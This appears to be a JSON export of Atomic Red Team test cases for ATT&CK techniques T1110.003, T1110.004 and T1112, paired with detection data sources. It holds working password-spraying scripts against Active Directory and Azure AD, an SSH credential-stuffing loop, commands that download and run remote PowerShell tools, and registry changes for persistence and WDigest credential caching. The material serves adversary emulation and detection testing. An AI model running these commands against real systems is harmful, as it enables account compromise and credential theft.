System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = 'P@ssw0rd!'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server $env:UserDnsDomain | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"$env:UserDnsDomain\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = '#{password}'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"$env:UserDnsDomain\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "if (\"NTLM\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = '#{password}'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{valid_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{valid_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"P@ssw0rd!\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting P@ssw0rd! on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:P@ssw0rd! are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:P@ssw0rd! invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{valid_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting #{password} on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:#{password} are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:#{password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"iamthebatman\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{valid_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting #{password} on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:#{password} are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:#{password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndomainpassspray -consoleoutput -noninteractive -emptypasswords", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": null, + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "function Invoke-dpsLight ($Password, $userlist) {\n$users = Get-Content $userlist\n$Domain = \"LDAP://\" + ([ADSI]\"\").distinguishedName\nforeach ($User in $users) {\n $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)\n if ($Domain_check.name -ne $null) {\n Write-Host -ForegroundColor Green \"Password found for User:$User Password:$Password\"\n }\n else { Write-Host \". \" -NoNewline}\n}\nWrite-Host -ForegroundColor green \"Finished\"\n}\nInvoke-dpsLight \"Spring2020\" $env:Temp\\usersdpsLight.txt\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1110.003", + "display_name": "Brute Force: Password Spraying", + "atomic_tests": [ + { + "name": "Password Spray all Domain Users", + "auto_generated_guid": "90bc2e54-6c84-47a5-9439-0a2a92b4b175", + "description": "CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.\nThis atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\\users.txt list. Any successful authentications will be printed to the screen with a message like \"[*] username:password\", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray.\nUse the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.\nSee the \"Windows FOR Loop Password Spraying Made Easy\" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "password": { + "description": "The password to try for each user in users.txt", + "type": "String", + "default": "Spring2020" + } + }, + "dependencies": [ + { + "description": "List of domain users to password spray must exits at %temp%\\users.txt\n", + "prereq_command": "if not exist %temp%\\users.txt (exit /b 1)\n", + "get_prereq_command": "PathToAtomicsFolder\\T1110.003\\src\\parse_net_users.bat\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "@FOR /F %n in (%temp%\\users.txt) do @echo | set/p=. & @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%n\" \"#{password}\" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\\IPC$ > NUL\n" + } + }, + { + "name": "Password Spray (DomainPasswordSpray)", + "auto_generated_guid": "263ae743-515f-4786-ac7d-41ef3a0d4b2b", + "description": "Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain\n\nhttps://github.com/dafthack/DomainPasswordSpray\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Domain to brute force against", + "type": "String", + "default": "$Env:USERDOMAIN" + } + }, + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force\n" + } + }, + { + "name": "Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)", + "auto_generated_guid": "f14d956a-5b6e-4a93-847f-0c415142f07d", + "description": "Attempt to brute force all Active Directory domain users with a single password (called \"password spraying\") on a domain controller, via LDAP, with NTLM or Kerberos\n\nPrerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "password": { + "description": "single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)", + "type": "String", + "default": "P@ssw0rd!" + }, + "domain": { + "description": "Domain FQDN", + "type": "String", + "default": "$env:UserDnsDomain" + }, + "auth": { + "description": "authentication method to choose between \"NTLM\" and \"Kerberos\"", + "type": "String", + "default": "NTLM" + } + }, + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = '#{password}'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n" + } + }, + { + "name": "Password spray all Azure AD users with a single password", + "auto_generated_guid": "a8aa2d3e-1c52-4016-bc73-0f8854cfa80a", + "description": "Attempt to brute force all Azure AD users with a single password (called \"password spraying\") via AzureAD Powershell module.\nValid credentials are only needed to fetch the list of Azure AD users.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "password": { + "description": "Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)", + "type": "String", + "default": "P@ssw0rd!" + }, + "valid_username": { + "description": "Valid username to retrieve Azure AD users. We encourage users running this atomic to add a valid microsoft account domain; for eg @", + "type": "String", + "default": "bruce.wayne@contoso.com" + }, + "valid_password": { + "description": "Valid password to authenticate as valid_username in the ", + "type": "String", + "default": "iamthebatman" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{valid_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{valid_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting #{password} on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:#{password} are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:#{password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n" + } + }, + { + "name": "WinPwn - DomainPasswordSpray Attacks", + "auto_generated_guid": "5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82", + "description": "DomainPasswordSpray Attacks technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndomainpassspray -consoleoutput -noninteractive -emptypasswords", + "name": "powershell" + } + }, + { + "name": "Password Spray Invoke-DomainPasswordSpray Light", + "auto_generated_guid": "b15bc9a5-a4f3-4879-9304-ea0011ace63a", + "description": "Perform a domain password spray using the same core method of the [DomainPasswordSpray tool](https://github.com/dafthack/DomainPasswordSpray) \nbut without all the extra code that makes the script get blocked by many AVs. \nThis atomic test will attempt a single password against all users in a password list at $env:Temp\\usersdpsLight.txt. You can create this file manually\nor with the automated prereq_command. The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_limit": { + "description": "The max number of users to put in the list when running the prereq_command", + "type": "Integer", + "default": 200 + }, + "password": { + "description": "The password to try for each user in users.txt", + "type": "String", + "default": "Spring2020" + } + }, + "dependencies": [ + { + "description": "Username file must exist at $env:Temp\\usersdpsLight.txt\n", + "prereq_command": "if (Test-Path $env:Temp\\usersdpsLight.txt) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host -NoNewLine \"Reading Users.\" # this code modifed from https://github.com/ZoomerHulkHogan/Powershell-Domain-User-Enumeration\n$netOutput = net users /domain\n$netOutput = [System.Collections.ArrayList]($netOutput[6..($netOutput.length-3)])\n$userLimit = #{user_limit}; $usercount = 0\nforeach ($line in $netOutput) {\n if($usercount -ge $userLimit){break}\n $line = $line.trim()\n $line = $line -split '\\s\\s+'\n foreach ($user in $line){\n if($usercount -ge $userLimit){break}\n Add-Content $env:Temp\\usersdpsLight.txt $user\n $usercount = $usercount + 1\n } \n}\nWrite-Host \"Usernames saved to $env:Temp\\usersdpsLight.txt\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "function Invoke-dpsLight ($Password, $userlist) {\n$users = Get-Content $userlist\n$Domain = \"LDAP://\" + ([ADSI]\"\").distinguishedName\nforeach ($User in $users) {\n $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)\n if ($Domain_check.name -ne $null) {\n Write-Host -ForegroundColor Green \"Password found for User:$User Password:$Password\"\n }\n else { Write-Host \". \" -NoNewline}\n}\nWrite-Host -ForegroundColor green \"Finished\"\n}\nInvoke-dpsLight \"#{password}\" $env:Temp\\usersdpsLight.txt\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1110.004", + "command_list": [ + "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n" + ], + "commands": [ + { + "command": "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", + "source": "atomics/T1110.004/T1110.004.yaml", + "name": "Atomic Red Team Test - Brute Force: Credential Stuffing" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1110.004", + "display_name": "Brute Force: Credential Stuffing", + "atomic_tests": [ + { + "name": "SSH Credential Stuffing From Linux", + "auto_generated_guid": "4f08197a-2a8a-472d-9589-cd2895ef22ad", + "description": "Using username,password combination from a password dump to login over SSH.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "target_host": { + "description": "IP Address / Hostname you want to target.", + "type": "String", + "default": "localhost" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires SSHPASS\n", + "prereq_command": "if [ -x \"$(command -v sshpass)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo \"This test requires sshpass\" ; fi ;\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" + } + }, + { + "name": "SSH Credential Stuffing From MacOS", + "auto_generated_guid": "d546a3d9-0be5-40c7-ad82-5a7d79e1b66b", + "description": "Using username,password combination from a password dump to login over SSH.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "target_host": { + "description": "IP Address / Hostname you want to target.", + "type": "String", + "default": "localhost" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires SSHPASS\n", + "prereq_command": "if [ -x \"$(command -v sshpass)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "/bin/bash -c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)\"\nbrew install hudochenkov/sshpass/sshpass\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1112", + "command_list": [ + "reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /t REG_DWORD /v HideFileExt /d 1 /f\n", + "reg add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /t REG_EXPAND_SZ /v SecurityHealth /d calc.exe /f\n", + "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\n", + "$key= \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\\"\n$name =\"bad-subdomain\"\nnew-item $key -Name $name -Force\nnew-itemproperty $key$name -Name https -Value 2 -Type DWORD;\nnew-itemproperty $key$name -Name http -Value 2 -Type DWORD;\nnew-itemproperty $key$name -Name * -Value 2 -Type DWORD;\n", + "New-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" -Name T1112 -Value \"'\"\n", + null + ], + "commands": [ + { + "command": "mshta.exe 